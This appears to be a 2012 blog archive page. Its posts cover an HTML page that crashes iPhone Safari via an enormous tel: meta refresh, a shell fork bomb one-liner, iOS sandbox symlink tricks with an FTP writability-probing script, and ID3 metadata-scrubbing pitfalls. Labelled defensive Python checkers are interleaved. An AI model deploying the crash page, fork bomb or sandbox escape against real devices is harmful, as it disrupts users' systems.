September 2012 Archives
Thu Sep 27 13:58:04 UTC 2012
iPhone Safari crash (other browsers too...)
It doesn't go much simpler than this:
<!DOCTYPE html>
<html>
<meta http-equiv="refresh" content="3;URL=tel:(4MB of X)">
<title>DIE, iPhone, DIE!</title>
<body>
<h1>DIE, iPhone, DIE!</h1>
<p>
<img src="http://whitsblog.com/wp-content/uploads/2012/05/Rick-astley-never-gonna-give-you-up.jpg">
<br>
Never gonna browse the web!
</p>
</body>
</html>
Even Force Quit won't stop it... but the watchdog timer, or the reboot trick (hold both buttons for a few seconds) will.
But this is a HUGE file...
My browser is crashing .............
I warned you about crash bro!!!!!
I told you dog!
It keeps happening
I told you man
I TOLD you about crash!
But seriously: how to remove it?
Ah... yes. Safari is so nice and even saves the open tabs before crashing the phone.
Either you can be fast and close the tab before it has fully loaded.
Or, you can enable airplane mode in Settings, clear Safari's cache, open Safari, close the tab, and disable airplane mode again (thanks to Sergeij2000 on the Heise forum for this hint).
Or, you can enable and disable private browsing mode in Safari's settings, and when asked whether you want to close all tabs, confirm (thanks to ticaki on the Heise forum for this hint).
UPDATE: Try this link to get an idea of why it seems to crash. This one is so short it does not cause a crash; however, it does cause display corruption (dialog text overwriting dialog buttons) on the iPhone. Apparently the crash bug of the iPhone is in formatting the confirmation message dialog box... and it then ends up looking like this:

UPDATE: This vulnerability is not new; Apple should have been aware of it for 3 years now and hasn't fixed it yet. See: CVE-2009-3271
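The crash above is triggered by handing Mobile Safari a tel: target that is millions of characters long, so the useful check on the receiving side (a content filter, a proxy, a crawler feeding a mobile test fleet) is simply "does this page contain a tel: link or meta refresh whose number is absurdly long?". The following is an added example, not code from the original post: a small Python audit that walks the HTML, collects every tel: target reachable via meta refresh or an anchor, and reports those over a length limit. MAX_TEL_LEN, the class and function names, and the 100,000-character sample page (standing in for the post's 4 MB of X) are assumptions made here.

```python
import re
from html.parser import HTMLParser

# Assumption for this example: no legitimate dial string comes anywhere near this length.
MAX_TEL_LEN = 64

# The "3;URL=tel:..." form used by <meta http-equiv="refresh"> on the page above.
REFRESH_RE = re.compile(r"^\s*\d+\s*;\s*url\s*=\s*(?P<url>.+)$", re.IGNORECASE | re.DOTALL)


class TelLinkAuditor(HTMLParser):
    """Collect every tel: target the page would hand to the dialer, with its length."""

    def __init__(self):
        super().__init__()
        self.findings = []  # list of (source, number of characters after "tel:")

    def _note(self, source, url):
        url = (url or "").strip()
        if url.lower().startswith("tel:"):
            self.findings.append((source, len(url) - len("tel:")))

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # attribute names arrive lowercased; valueless attributes are None
        if tag == "meta" and (a.get("http-equiv") or "").lower() == "refresh":
            m = REFRESH_RE.match(a.get("content") or "")
            if m:
                self._note("meta refresh", m.group("url"))
        elif tag == "a":
            self._note("a href", a.get("href"))


def oversized_tel_targets(html, limit=MAX_TEL_LEN):
    """Return (source, length) for each tel: target longer than limit, in document order."""
    parser = TelLinkAuditor()
    parser.feed(html)
    parser.close()
    return [finding for finding in parser.findings if finding[1] > limit]


# Constructed stand-in for the crash page: 100,000 X's instead of 4 MB, plus one normal link.
SAMPLE_HTML = (
    '<!DOCTYPE html><html><meta http-equiv="refresh" content="3;URL=tel:%s">'
    '<title>DIE, iPhone, DIE!</title><body><a href="tel:+1-555-0100">call</a></body></html>'
) % ("X" * 100000)

if __name__ == "__main__":
    for source, length in oversized_tel_targets(SAMPLE_HTML):
        print("suspicious tel: target via %s, %d characters" % (source, length))
```

The legitimate `+1-555-0100` link is not reported, only the meta refresh target. The same parser can be pointed at other dialer-style schemes (sms:, facetime:) by widening the prefix check in `_note`.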
Wed Sep 12 14:59:03 UTC 2012
Scrubbing Metadata is Not Easy
Take some random MP3 file.
$ dd if=/dev/urandom bs=1k count=1024 | lame -r -s 44.1 -m s - test.mp3
1024+0 records in
1024+0 records out
1048576 bytes (1.0 MB) copied, 0.18162 s, 5.8 MB/s
Assuming raw pcm input file
LAME 3.99.5 64bits (http://lame.sf.net)
Using polyphase lowpass filter, transition band: 16538 Hz - 17071 Hz
Encoding <stdin> to test.mp3
Encoding as 44.1 kHz stereo MPEG-1 Layer III (11x) 128 kbps qval=3
Add some ID3 tags to it...
$ perl -e 'printf "TAGThis is tag number %-105d\xFF", $_ for reverse 1..8' >> test.mp3
$ id3v2 -l test.mp3
id3v1 tag info for test.mp3:
Title  : This is tag number 1            Artist:
Album  :                                 Year:     , Genre: Unknown (255)
Comment:
test.mp3: No ID3v2 tag
Try remuxing it using ffmpeg, and instruct ffmpeg to remove metadata (see manpage):
$ ffmpeg -i test.mp3 -map_metadata -1 -c:a copy test-2.mp3
ffmpeg version 0.11.1 Copyright (c) 2000-2012 the FFmpeg developers
built on Jun 9 2012 13:50:13 with gcc 4.7.0 20120505 (prerelease)
configuration: --prefix=/usr --enable-libmp3lame --enable-libvorbis --enable-libxvid --enable-libx264 --enable-libvpx --enable-libtheora --enable-libgsm --enable-libspeex --enable-postproc --enable-shared --enable-x11grab --enable-libopencore_amrnb --enable-libopencore_amrwb --enable-libschroedinger --enable-libopenjpeg --enable-librtmp --enable-libpulse --enable-libv4l2 --enable-gpl --enable-version3 --enable-runtime-cpudetect --disable-debug --disable-static
libavutil 51. 54.100 / 51. 54.100
libavcodec 54. 23.100 / 54. 23.100
libavformat 54. 6.100 / 54. 6.100
libavdevice 54. 0.100 / 54. 0.100
libavfilter 2. 77.100 / 2. 77.100
libswscale 2. 1.100 / 2. 1.100
libswresample 0. 15.100 / 0. 15.100
libpostproc 52. 0.100 / 52. 0.100
[mp3 @ 0x237a100] max_analyze_duration 5000000 reached at 5015510
Input #0, mp3, from 'test.mp3':
Metadata:
title : This is tag number 1
artist :
album :
date :
comment :
Duration: 00:00:05.98, start: 0.000000, bitrate: 129 kb/s
Stream #0:0: Audio: mp3, 44100 Hz, stereo, s16, 128 kb/s
Output #0, mp3, to 'test-2.mp3':
Metadata:
TSSE : Lavf54.6.100
Stream #0:0: Audio: mp3, 44100 Hz, stereo, 128 kb/s
Stream mapping:
Stream #0:0 -> #0:0 (copy)
Press [q] to stop, [?] for help
size= 95kB time=00:00:06.00 bitrate= 129.2kbits/s
video:0kB audio:94kB global headers:0kB muxing overhead 0.466835%
Metadata is in input, but not in output. Looks like it worked, right? To make absolutely sure, let's do it again:
$ ffmpeg -i test-2.mp3 -map_metadata -1 -c:a copy test-3.mp3
ffmpeg version 0.11.1 Copyright (c) 2000-2012 the FFmpeg developers
built on Jun 9 2012 13:50:13 with gcc 4.7.0 20120505 (prerelease)
configuration: --prefix=/usr --enable-libmp3lame --enable-libvorbis --enable-libxvid --enable-libx264 --enable-libvpx --enable-libtheora --enable-libgsm --enable-libspeex --enable-postproc --enable-shared --enable-x11grab --enable-libopencore_amrnb --enable-libopencore_amrwb --enable-libschroedinger --enable-libopenjpeg --enable-librtmp --enable-libpulse --enable-libv4l2 --enable-gpl --enable-version3 --enable-runtime-cpudetect --disable-debug --disable-static
libavutil 51. 54.100 / 51. 54.100
libavcodec 54. 23.100 / 54. 23.100
libavformat 54. 6.100 / 54. 6.100
libavdevice 54. 0.100 / 54. 0.100
libavfilter 2. 77.100 / 2. 77.100
libswscale 2. 1.100 / 2. 1.100
libswresample 0. 15.100 / 0. 15.100
libpostproc 52. 0.100 / 52. 0.100
[mp3 @ 0x259c100] max_analyze_duration 5000000 reached at 5015510
Input #0, mp3, from 'test-2.mp3':
Metadata:
encoder : Lavf54.6.100
Duration: 00:00:06.00, start: 0.000000, bitrate: 129 kb/s
Stream #0:0: Audio: mp3, 44100 Hz, stereo, s16, 128 kb/s
Output #0, mp3, to 'test-3.mp3':
Metadata:
TSSE : Lavf54.6.100
Stream #0:0: Audio: mp3, 44100 Hz, stereo, 128 kb/s
Stream mapping:
Stream #0:0 -> #0:0 (copy)
Press [q] to stop, [?] for help
size= 95kB time=00:00:06.00 bitrate= 129.1kbits/s
video:0kB audio:94kB global headers:0kB muxing overhead 0.467454%
Indeed, my Title tag is no longer displayed by ffmpeg. Now the output file of this should be twice as clean, right? Let's see with ffprobe...
$ ffprobe test-3.mp3
ffprobe version 0.11.1 Copyright (c) 2007-2012 the FFmpeg developers
built on Jun 9 2012 13:50:13 with gcc 4.7.0 20120505 (prerelease)
configuration: --prefix=/usr --enable-libmp3lame --enable-libvorbis --enable-libxvid --enable-libx264 --enable-libvpx --enable-libtheora --enable-libgsm --enable-libspeex --enable-postproc --enable-shared --enable-x11grab --enable-libopencore_amrnb --enable-libopencore_amrwb --enable-libschroedinger --enable-libopenjpeg --enable-librtmp --enable-libpulse --enable-libv4l2 --enable-gpl --enable-version3 --enable-runtime-cpudetect --disable-debug --disable-static
libavutil 51. 54.100 / 51. 54.100
libavcodec 54. 23.100 / 54. 23.100
libavformat 54. 6.100 / 54. 6.100
libavdevice 54. 0.100 / 54. 0.100
libavfilter 2. 77.100 / 2. 77.100
libswscale 2. 1.100 / 2. 1.100
libswresample 0. 15.100 / 0. 15.100
libpostproc 52. 0.100 / 52. 0.100
[mp3 @ 0x12df240] max_analyze_duration 5000000 reached at 5015510
Input #0, mp3, from 'test-3.mp3':
Metadata:
encoder : Lavf54.6.100
Duration: 00:00:06.00, start: 0.000000, bitrate: 129 kb/s
Stream #0:0: Audio: mp3, 44100 Hz, stereo, s16, 128 kb/s
Clean indeed.
$ id3v2 -l test-3.mp3
id3v1 tag info for test-3.mp3:
Title  : This is tag number 3            Artist:
Album  :                                 Year:     , Genre: Unknown (255)
Comment:
test-3.mp3: No ID3v2 tag
Trust no one.
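What the ffmpeg runs above show is that a stripper which removes "the" ID3v1 tag removes exactly one 128-byte block from the end of the file, so eight stacked tags survive seven passes. The check a practitioner wants before trusting any scrubbed file is to peel trailing tags until none remain and count them. The following is an added example, not the post's own code: a Python audit that counts stacked ID3v1 blocks at the end of a file, strips all of them, and also measures a leading ID3v2 tag by its sync-safe size. The sample file is constructed inline (1024 filler bytes that are not real MPEG frames, plus eight tags appended in the same order as the perl one-liner); the function names are assumptions made here.

```python
ID3V1_SIZE = 128


def build_id3v1_tag(title, genre=255):
    """One 128-byte ID3v1 block laid out like the post's perl one-liner:
    'TAG' + title(30) + artist(30) + album(30) + year(4) + comment(30) + genre(1)."""
    fields = title.ljust(30) + " " * (30 + 30 + 4 + 30)
    tag = b"TAG" + fields.encode("latin-1") + bytes([genre])
    if len(tag) != ID3V1_SIZE:
        raise ValueError("title longer than 30 characters")
    return tag


def split_id3v1(data):
    """Peel off every ID3v1 block stacked at the end of data.
    Returns (body, titles); titles run from the file's end inward, which is the
    order a one-block-per-pass tool such as the ffmpeg run above exposes them."""
    titles = []
    while len(data) >= ID3V1_SIZE and data[-ID3V1_SIZE:-ID3V1_SIZE + 3] == b"TAG":
        block = data[-ID3V1_SIZE:]
        titles.append(block[3:33].decode("latin-1").rstrip(" \x00"))
        data = data[:-ID3V1_SIZE]
    return data, titles


def leading_id3v2_size(data):
    """Bytes occupied by an ID3v2 tag at the start of data, 0 if there is none.
    Header: 'ID3', version(2), flags(1), size(4 sync-safe bytes, 7 bits each,
    excluding the 10-byte header); flag bit 4 announces a 10-byte footer."""
    if len(data) < 10 or data[:3] != b"ID3":
        return 0
    flags = data[5]
    size = 0
    for b in data[6:10]:
        if b & 0x80:
            return 0  # high bit set: not sync-safe, treat the header as malformed
        size = (size << 7) | b
    return 10 + size + (10 if flags & 0x10 else 0)


def audit(data):
    """Summarise what a metadata scrubber must deal with in this file."""
    body, titles = split_id3v1(data)
    return {"id3v2_bytes": leading_id3v2_size(data), "id3v1_tags": len(titles), "titles": titles}


def make_sample(n_tags=8):
    """Constructed stand-in for test.mp3: filler bytes (not real MPEG frames) followed by
    n_tags appended ID3v1 blocks, tag n written first and tag 1 last, like `for reverse 1..8`."""
    filler = bytes(range(256)) * 4
    tags = b"".join(build_id3v1_tag("This is tag number %d" % i) for i in range(n_tags, 0, -1))
    return filler + tags


if __name__ == "__main__":
    sample = make_sample()
    print("original:", audit(sample))
    print("after removing one block:", audit(sample[:-ID3V1_SIZE]))  # what a single pass leaves
    print("after removing all blocks:", audit(split_id3v1(sample)[0]))
```

Removing one block from the sample leaves "This is tag number 2" as the visible title, exactly the behaviour of the second ffmpeg pass above; only `split_id3v1` gets the count to zero. The tail check is a heuristic: audio data that happens to end in the bytes "TAG" would be misread as a tag, so a scrubber should pair it with a frame-level parse before cutting.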
Wed Sep 12 14:42:09 UTC 2012
Funny Forkbomb
This shell script is a (single-forking-process) fork bomb in dash and busybox sh, but not in bash and ksh:
#!/bin/sh
S=`yes|head -n 32769`;while :;do exec<<S;done
$S
S
Why? And why exactly 32769?
Actually a neat trick to avoid tempfiles for here-documents, like bash uses...
Wed Sep 12 14:28:28 UTC 2012
Exploring the iPhone file system sandbox
There is a little known way to explore the iPhone file system without jailbreaking, at least on iPhone 4 and iOS 5.1.1:
- Take any app with file browser or FTP server functionality.
- Create a relative symbolic link to the file system root in its Documents folder:
$ ifuse --appid APPID ~/mnt
$ cd ~/mnt
$ ln -snf ../../../../../.. root
- Open the app (or the FTP client)
- Enjoy!
Note that sandbox restrictions still apply; you will not be able to read another app's data this way.
I also did a brute force search for writable directories outside the app sandbox, and did not find any. I wrote this script for the purpose:
#!/usr/bin/perl
use strict;
use warnings;
use Net::FTP;

# Match one line of a `dir` listing; only directories (type 'd') are followed.
my $list_regex = qr/
    ^
    (?<type>d)
    (?<perms>\S+)
    \s+
    (?<links>\S+)
    \s+
    (?<user>\S+)
    \s+
    (?<group>\S+)
    \s+
    (?<size>\S+)
    \s+
    (?<date>\w\w\w\ .{8})
    \s+
    (?<name>.*)
    $
/x;

@ARGV == 5
    or die "Usage: $0 host port user pass root";
my ($host, $port, $user, $pass, $root) = @ARGV;

my $ftp = Net::FTP->new("$host:$port", Debug => 0, Passive => 1)
    or die "No ftp: $@";
$ftp->login($user, $pass)
    or die "No user/pass: " . $ftp->message;

# The full recursive listing is saved for later inspection.
open my $fh, ">", "ls-lR.txt"
    or warn ">ls-lR.txt: $!";

my @results = ();       # directories where the mkdir probe succeeded
my @queue = ($root);    # breadth-first walk, starting at the root link
while(@queue)
{
    my $item = shift @queue;
    print STDERR "[$item] found @{[scalar @results]} results\n";
    # Writability probe: try to create a directory, then see whether it shows up in the listing.
    $ftp->mkdir($item . "/WRITETEST");
    my $list = $ftp->dir($item) || [];   # array reference in scalar context
    print $fh "$item:\n";
    for(@$list)
    {
        print $fh "$_\n";
        /$list_regex/
            or next;
        my $name = $+{name};
        next
            if $name eq '.' or $name eq '..';
        if($name eq 'WRITETEST')
        {
            push @results, $item;
            $ftp->rmdir($item . "/WRITETEST");
            next;
        }
        push @queue, "$item/$name";
    }
    print $fh "\n";
}
close $fh;
print "$_\n"
    for @results;
$ftp->quit;
UPDATE: This symlink hack has been fixed in iOS 6. I found a new way to create this link; however, apparently due to an issue in ideviceinstaller, doing this loses the Documents content of the app:
$ ideviceinstaller -o uninstall -o remove -o copy=. -a com.dspmobile.dbmeterpro
$ unzip -l com.dspmobile.dbmeterpro.ipa
$ mkdir -p "Payload/dB Meter Pro.app"
$ ln -snf ../../../../../.. "Payload/dB Meter Pro.app/root"
$ zip -0y com.dspmobile.dbmeterpro.ipa "Payload/dB Meter Pro.app/root"
$ ideviceinstaller -i com.dspmobile.dbmeterpro.ipa
$ ifuse --appid com.dspmobile.dbmeterpro ~/mnt
$ ln -snf "../dB Meter Pro.app/root" ~/mnt/root
$ fusermount -u ~/mnt
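The repacked .ipa above carries its escape as an ordinary zip entry: `zip -y` stores a symlink as a file whose data is the link target and whose Unix mode (in the high 16 bits of the external attributes) has the S_IFLNK bit set. Anyone vetting app bundles before sideloading can therefore catch this class of link without installing anything. The following is an added example, not code from the post: a Python check that lists every symlink in an .ipa whose target is absolute or resolves outside Payload/. The sample archive is constructed in memory with the post's `root` link beside a harmless in-bundle link; the function names are assumptions made here.

```python
import io
import posixpath
import stat
import zipfile

BUNDLE_ROOT = "Payload/"


def _is_symlink(info):
    """zip keeps the Unix mode in the high 16 bits of external_attr (what `zip -y` writes)."""
    return stat.S_ISLNK(info.external_attr >> 16)


def escaping_symlinks(ipa_bytes):
    """Return (entry name, link target) for every symlink in the archive whose target,
    resolved relative to the entry's own directory, is absolute or leaves Payload/."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(ipa_bytes)) as z:
        for info in z.infolist():
            if not _is_symlink(info):
                continue
            target = z.read(info).decode("utf-8", "replace")  # a symlink entry's data is its target
            if target.startswith("/"):
                flagged.append((info.filename, target))
                continue
            resolved = posixpath.normpath(posixpath.join(posixpath.dirname(info.filename), target))
            if not resolved.startswith(BUNDLE_ROOT):
                flagged.append((info.filename, target))
    return flagged


def build_sample_ipa():
    """Constructed .ipa: one plist, the post's escaping `root` link, and a link that stays inside."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("Payload/dB Meter Pro.app/Info.plist", '<plist version="1.0"/>')
        links = [
            ("Payload/dB Meter Pro.app/root", "../../../../../.."),  # the link from the post
            ("Payload/dB Meter Pro.app/plist-alias", "Info.plist"),  # resolves inside the bundle
        ]
        for name, target in links:
            zi = zipfile.ZipInfo(name)
            zi.external_attr = (stat.S_IFLNK | 0o777) << 16  # mark the entry as a symlink
            z.writestr(zi, target)
    return buf.getvalue()


if __name__ == "__main__":
    for name, target in escaping_symlinks(build_sample_ipa()):
        print("symlink escapes the bundle: %s -> %s" % (name, target))
```

`posixpath.normpath` keeps leading `..` components, so a target with more `..` than there are directories above it normalises to something like `../../../..`, which fails the Payload/ prefix test; an absolute target is rejected before resolution. Real archives may store symlink modes in the same way for any Unix-origin zip, so the check is not specific to ipa files.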